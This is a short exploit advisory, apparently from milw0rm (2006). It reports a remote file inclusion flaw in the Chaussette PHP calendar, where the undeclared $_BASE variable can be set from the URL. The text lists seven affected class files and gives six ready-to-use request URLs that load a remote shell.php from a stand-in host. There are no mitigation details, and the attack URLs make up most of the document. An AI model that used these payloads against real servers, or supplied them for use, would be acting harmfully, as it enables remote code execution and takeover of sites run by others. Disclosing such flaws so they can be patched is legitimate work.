Chaussette Remote File Inclusion CreW: ToXiC Bug Found By Drago84 Source Code: http://freshmeat.net/redir/chaussette/64502/url_zip/chaussette.zip Page Affect /Classes/Evenement.php /Classes/Event.php /Classes/Event_for_month.php /Classes/Event_for_month_per_day.php /Classes/Event_for_week.php /Classes/My_Log.php /Classes/My_Smarty.php Problem Is : $_BASE Not Declare; ExP: http://www.site.com/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php http://www.site.com/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php http://www.site.com/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php http://www.site.com/dir_Chaussette/Classes/Event_for_week.php?_BASE=http://www.evalsite.com/shell.php http://www.site.com/dir_Chaussette/Classes/My_Log.php?_BASE=http://www.evalsite.com/shell.php http://www.site.com/dir_Chaussette/Classes/My_Smarty.php?_BASE=http://www.evalsite.com/shell.php Greatz: Str0ke # milw0rm.com [2006-08-10]
